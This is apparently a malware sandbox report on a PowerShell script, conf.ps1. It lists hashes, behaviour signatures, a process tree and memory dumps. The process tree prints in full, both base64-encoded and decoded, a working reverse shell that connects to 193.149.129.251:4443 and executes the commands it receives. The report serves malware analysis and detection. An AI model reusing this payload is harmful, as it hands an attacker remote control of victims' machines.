8d88ae22dc0c9ba278d7231f01276a6eb740b1c85c4fb11188c9b3164fd7add2

General

Target

conf.ps1
Size

1KB
MD5

0f90fbaf92f07116aff5dccd2d63d082
SHA1

958e20247d81d07ce09bffbb649d5ee172539d2f
SHA256

8d88ae22dc0c9ba278d7231f01276a6eb740b1c85c4fb11188c9b3164fd7add2
SHA512

9a586633290e323e2d0c66aba285a3e5ca4b8d03699efd9e71336a5a4067cad7c4bd305fd02647eec7ea214c83b18a3b2789ee92ccf08aa4222fa22d8b034b20

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

2 2512 powershell.exe
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid process

2864 powershell.exe
2588 powershell.exe
2588 powershell.exe
2588 powershell.exe
2512 powershell.exe

flow	pid	process
2	2512	powershell.exe

pid	process
2864	powershell.exe
2588	powershell.exe
2588	powershell.exe
2588	powershell.exe
2512	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exewhoami.exe

description	pid	process
Token: SeDebugPrivilege	2864	powershell.exe
Token: SeDebugPrivilege	2588	powershell.exe
Token: SeDebugPrivilege	2512	powershell.exe
Token: SeDebugPrivilege	2472	whoami.exe

Suspicious use of WriteProcessMemory 9 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description	pid	process	target process
PID 2864 wrote to memory of 2588	2864	powershell.exe	powershell.exe
PID 2864 wrote to memory of 2588	2864	powershell.exe	powershell.exe
PID 2864 wrote to memory of 2588	2864	powershell.exe	powershell.exe
PID 2588 wrote to memory of 2512	2588	powershell.exe	powershell.exe
PID 2588 wrote to memory of 2512	2588	powershell.exe	powershell.exe
PID 2588 wrote to memory of 2512	2588	powershell.exe	powershell.exe
PID 2512 wrote to memory of 2472	2512	powershell.exe	whoami.exe
PID 2512 wrote to memory of 2472	2512	powershell.exe	whoami.exe
PID 2512 wrote to memory of 2472	2512	powershell.exe	whoami.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\conf.ps1
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2864

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -e UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAUABTAEgATwBNAEUAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAewAkAFQAQwBQAEMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQA5ADMALgAxADQAOQAuADEAMgA5AC4AMgA1ADEAJwAsACAANAA0ADQAMwApADsAJABOAGUAdAB3AG8AcgBrAFMAdAByAGUAYQBtACAAPQAgACQAVABDAFAAQwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwAkAFMAdAByAGUAYQBtAFcAcgBpAHQAZQByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBXAHIAaQB0AGUAcgAoACQATgBlAHQAdwBvAHIAawBTAHQAcgBlAGEAbQApADsAZgB1AG4AYwB0AGkAbwBuACAAVwByAGkAdABlAFQAbwBTAHQAcgBlAGEAbQAgACgAJABTAHQAcgBpAG4AZwApACAAewBbAGIAeQB0AGUAWwBdAF0AJABzAGMAcgBpAHAAdAA6AEIAdQBmAGYAZQByACAAPQAgADAALgAuACQAVABDAFAAQwBsAGkAZQBuAHQALgBSAGUAYwBlAGkAdgBlAEIAdQBmAGYAZQByAFMAaQB6AGUAIAB8ACAAJQAgAHsAMAB9ADsAJABTAHQAcgBlAGEAbQBXAHIAaQB0AGUAcgAuAFcAcgBpAHQAZQAoACQAUwB0AHIAaQBuAGcAKQA7ACQAUwB0AHIAZQBhAG0AVwByAGkAdABlAHIALgBGAGwAdQBzAGgAKAApAH0AVwByAGkAdABlAFQAbwBTAHQAcgBlAGEAbQAgACcAJwA7AHcAaABpAGwAZQAoACgAJABCAHkAdABlAHMAUgBlAGEAZAAgAD0AIAAkAE4AZQB0AHcAbwByAGsAUwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABCAHUAZgBmAGUAcgAsACAAMAAsACAAJABCAHUAZgBmAGUAcgAuAEwAZQBuAGcAdABoACkAKQAgAC0AZwB0ACAAMAApACAAewAkAEMAbwBtAG0AYQBuAGQAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAEIAdQBmAGYAZQByACwAIAAwACwAIAAkAEIAeQB0AGUAcwBSAGUAYQBkACAALQAgADEAKQA7ACQATwB1AHQAcAB1AHQAIAA9ACAAdAByAHkAIAB7AEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgACQAQwBvAG0AbQBhAG4AZAAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwB9ACAAYwBhAHQAYwBoACAAewAkAF8AIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwB9AFcAcgBpAHQAZQBUAG8AUwB0AHIAZQBhAG0AIAAoACQATwB1AHQAcAB1AHQAKQB9ACQAUwB0AHIAZQBhAG0AVwByAGkAdABlAHIALgBDAGwAbwBzAGUAKAApAH0AIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuAA==
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2588

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $TCPClient = New-Object Net.Sockets.TCPClient('193.149.129.251', 4443);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String);$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2512

C:\Windows\system32\whoami.exe
"C:\Windows\system32\whoami.exe"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2472

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
f0e147b5aee1a2443186b2e7b4e53380

SHA1
885c3ddb42ccf96be2887c816a0bad18569ab9ea

SHA256
e268b85f91130fa627bb4c1ec056ff875e63b552e32df19dd535ab04aea74ebf

SHA512
d87406d7dca3e13a9d56d1e7427e9a1d3534d7fe06e331e18d835e5a74be55d582269dea148058a73292ea3acbb8e0db93f72aa2f2ef717b1524c0ba4ac31ea1

Download Submit
memory/2512-28-0x000007FEF4810000-0x000007FEF51AD000-memory.dmp

Filesize
9.6MB

Download
memory/2512-37-0x00000000029F0000-0x0000000002A70000-memory.dmp

Filesize
512KB

Download
memory/2512-36-0x00000000029F0000-0x0000000002A70000-memory.dmp

Filesize
512KB

Download
memory/2512-35-0x00000000029F0000-0x0000000002A70000-memory.dmp

Filesize
512KB

Download
memory/2512-34-0x000007FEF4810000-0x000007FEF51AD000-memory.dmp

Filesize
9.6MB

Download
memory/2512-33-0x00000000029F0000-0x0000000002A70000-memory.dmp

Filesize
512KB

Download
memory/2512-31-0x00000000029F0000-0x0000000002A70000-memory.dmp

Filesize
512KB

Download
memory/2512-30-0x000007FEF4810000-0x000007FEF51AD000-memory.dmp

Filesize
9.6MB

Download
memory/2512-29-0x00000000029F0000-0x0000000002A70000-memory.dmp

Filesize
512KB

Download
memory/2588-20-0x0000000002540000-0x00000000025C0000-memory.dmp

Filesize
512KB

Download
memory/2588-17-0x0000000002540000-0x00000000025C0000-memory.dmp

Filesize
512KB

Download
memory/2588-19-0x000007FEF4810000-0x000007FEF51AD000-memory.dmp

Filesize
9.6MB

Download
memory/2588-21-0x0000000002540000-0x00000000025C0000-memory.dmp

Filesize
512KB

Download
memory/2588-23-0x000007FEF4810000-0x000007FEF51AD000-memory.dmp

Filesize
9.6MB

Download
memory/2588-18-0x000007FEF4810000-0x000007FEF51AD000-memory.dmp

Filesize
9.6MB

Download
memory/2864-12-0x0000000002C20000-0x0000000002CA0000-memory.dmp

Filesize
512KB

Download
memory/2864-4-0x000000001B370000-0x000000001B652000-memory.dmp

Filesize
2.9MB

Download
memory/2864-10-0x000007FEF4810000-0x000007FEF51AD000-memory.dmp

Filesize
9.6MB

Download
memory/2864-32-0x000007FEF4810000-0x000007FEF51AD000-memory.dmp

Filesize
9.6MB

Download
memory/2864-9-0x0000000002C20000-0x0000000002CA0000-memory.dmp

Filesize
512KB

Download
memory/2864-8-0x0000000002C20000-0x0000000002CA0000-memory.dmp

Filesize
512KB

Download
memory/2864-7-0x0000000002C20000-0x0000000002CA0000-memory.dmp

Filesize
512KB

Download
memory/2864-5-0x000007FEF4810000-0x000007FEF51AD000-memory.dmp

Filesize
9.6MB

Download
memory/2864-6-0x00000000022E0000-0x00000000022E8000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing